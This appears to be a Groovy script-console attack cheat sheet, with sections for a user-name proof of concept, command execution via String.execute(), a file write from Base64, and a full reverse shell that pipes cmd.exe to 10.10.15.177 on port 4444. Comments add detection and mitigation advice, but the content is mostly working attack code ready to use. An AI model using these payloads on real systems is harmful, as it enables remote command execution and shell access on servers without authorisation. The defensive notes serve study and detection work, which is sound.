
GROOVY

POC

// Prints the account the script engine is running as ("user.name" system property).
// Defender note: whatever is reachable by a script console inherits this account's
// privileges — run the hosting service under a least-privileged account and limit
// script execution to administrators.
println(System.properties['user.name'])

RCE

// Command execution via Groovy's String.execute(), which spawns a child process
// of the JVM hosting the script engine (the Groovy shortcut for Runtime.exec).
// Detection: a java/groovy host process spawning shells or system utilities is a
// strong signal; process-creation telemetry with parent/child lineage catches it.
// Mitigation: restrict or sandbox the script engine, require script approval, and
// run the host without privileges it does not need.
def command = "systeminfo"
def process = command.execute()
// Blocks until the child exits before its output is read below.
process.waitFor()

// The lines beginning with '#' are section labels on this page, not Groovy
// comments (Groovy uses //); the two endings are alternatives, not a sequence.
# OUTPUT
// Prints captured stdout from the finished process.
println "Output: ${process.text}"
# OR
// Returns the captured stdout to the caller of the script instead of printing it.
return process.text

Revshell

// Reverse shell: starts a local process, opens an outbound TCP connection to
// host:port, then relays the process's stdout/stderr to the socket and the
// socket's input to the process's stdin until the process exits or the socket
// closes. java.net.* and java.io.* are auto-imported by Groovy, so no imports
// appear here.
// Detection: an outbound connection from a JVM/script-host process paired with a
// cmd.exe (or shell) child of that process; the 50 ms polling loop keeps the
// connection long-lived, which stands out in egress logs.
// Mitigation: egress filtering from application servers, restricting the script
// console to administrators, and alerting on shell children of java processes.
String host="10.10.15.177";
int port=4444;
String cmd="cmd.exe";
// NOTE(review): redirectErrorStream(true) merges stderr into getInputStream(), so the
// getErrorStream() (pe) loop never yields data — it is dead code here.
// The empty catch is the polling idiom: exitValue() throws while the process is
// still alive, so the exception is swallowed and the loop continues; once it
// returns, the loop breaks and both the process and socket are torn down.
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Write Base64 Data To File

// Decodes a Base64 string and writes the raw bytes to a file, overwriting any
// existing content, then reports how many bytes were written.
// Defender note: a script engine that can write arbitrary bytes to disk is a
// file-drop primitive; file-creation telemetry on the hosting process and a
// read-only or sandboxed script runtime reduce the exposure.
def b64 = "SGVsbG8gZnJvbSBHcm9vdnkK"   // example Base64
byte[] data = b64.decodeBase64()
new File("/tmp/poc.txt").withOutputStream { out ->
    out.write(data)
}
println "Wrote ${data.length} bytes"